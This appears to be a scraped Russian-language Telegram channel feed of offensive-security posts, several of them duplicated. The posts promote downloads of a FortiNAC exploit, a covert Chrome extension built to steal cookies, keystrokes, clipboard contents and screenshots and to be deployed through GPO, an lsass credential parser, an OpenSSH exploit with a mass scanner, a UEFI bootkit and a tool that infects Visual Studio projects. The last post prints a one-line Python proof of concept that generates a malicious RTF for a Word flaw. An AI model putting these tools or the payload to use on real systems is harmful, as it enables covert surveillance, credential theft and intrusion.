CVE-2022-39952 Fortinet FortiNAC
CVSS score of 9.8
Продукты, затронутые уязвимостью:
FortiNAC version 9.4.0
FortiNAC version 9.2.0 through 9.2.5
FortiNAC version 9.1.0 through 9.1.7
FortiNAC 8.8 all versions
FortiNAC 8.7 all versions
FortiNAC 8.6 all versions
FortiNAC 8.5 all versions, and
FortiNAC 8.3 all versions
POC exploit
#forti #poc
CVSS score of 9.8
Продукты, затронутые уязвимостью:
FortiNAC version 9.4.0
FortiNAC version 9.2.0 through 9.2.5
FortiNAC version 9.1.0 through 9.1.7
FortiNAC 8.8 all versions
FortiNAC 8.7 all versions
FortiNAC 8.6 all versions
FortiNAC 8.5 all versions, and
FortiNAC 8.3 all versions
POC exploit
#forti #poc
👍13🔥3😱3
Давайте создадим расширение для Chrome, которое крадет ВСЁ
*
Ключевые правила:
1.Пользователь не должен знать, что за кулисами что-то происходит.
2.Не должно быть никаких визуальных признаков того, что что-то не так.
3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.
4. Нет дополнительных предупреждений браузера или диалогов разрешений.
5.Нет дополнительного сетевого трафика на уровне страниц.
*
В итоге мы воруем:
- Cookies
- History
- Screenshots
- User Navigation
- Page Traffic
- Keylogger
- Input Capturing
- Clipboard Capturing
- Capturing Geolocation
- Stealth Tab
*
Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )
spy-chrome-extension
#chrome #extension
*
Ключевые правила:
1.Пользователь не должен знать, что за кулисами что-то происходит.
2.Не должно быть никаких визуальных признаков того, что что-то не так.
3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.
4. Нет дополнительных предупреждений браузера или диалогов разрешений.
5.Нет дополнительного сетевого трафика на уровне страниц.
*
В итоге мы воруем:
- Cookies
- History
- Screenshots
- User Navigation
- Page Traffic
- Keylogger
- Input Capturing
- Clipboard Capturing
- Capturing Geolocation
- Stealth Tab
*
Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )
spy-chrome-extension
#chrome #extension
👍18😱2🔥1
Ударим ГовноПарсером lsass по приближающимся выходным !
download this shit (вас блин предупреждали)
download this shit (вас блин предупреждали)
👍6
Уполномоченный руководитель субъекта КИИ теперь ответственный, а заниматься защитой объекта можно без высшего образования — достаточно среднего. ФСТЭК внесла изменения в стандарты.
Яяяяяяяяяяяяяяяяяяяяяяяясно блеать, можно продолжать платить по студенческим расценкам !
Тем временем:
#СкребемПоКиберСусекам
Яяяяяяяяяяяяяяяяяяяяяяяясно блеать, можно продолжать платить по студенческим расценкам !
Тем временем:
#СкребемПоКиберСусекам
😱17🔥10👍6
OpenSSH 9.1 exploit and mass scan
*
Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.
download exploit and mass scan
#ssh #exploit #scanner
*
Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.
download exploit and mass scan
#ssh #exploit #scanner
🔥19👍4
bootlicker
Устаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.
*
vmvware-bootkit основан на устаревших руткитах
*
Download bootlicker
#rootkit #bootkit
Устаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.
*
vmvware-bootkit основан на устаревших руткитах
CosmicStrain, MoonBounce и ESPECTRE, что позволяет выполнять произвольное выполнение кода без срабатывания patchguard*
Download bootlicker
#rootkit #bootkit
😱6👍2
TCP Data Transfer Tool
Прикольно конечно в кернелМемори писать гадости\радости всякие.
В общем получается почти !!!
Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его.
Прикольно конечно в кернелМемори писать гадости\радости всякие.
В общем получается почти !!!
fileless attack, техника не новая и что там с runtime детектами не понятно, но все равно интересно.Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его.
👍5
APT38_0day-Stealer.rar
7.2 KB
Lazarus-Tactic (APT38)
*
Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).
В общем такой
*
Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).
В общем такой
0day-stealer
**После запуска программа заразит все ваши проекты Visual Studio**🔥21😱8👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Внимание !
через 10 минут опять понедельник.
Вот вам rootkit dog
😎
через 10 минут опять понедельник.
Вот вам rootkit dog
😎
🔥20😱6👍2
0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python
CVE-2023-21716 Python
PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))😱16👍7🔥1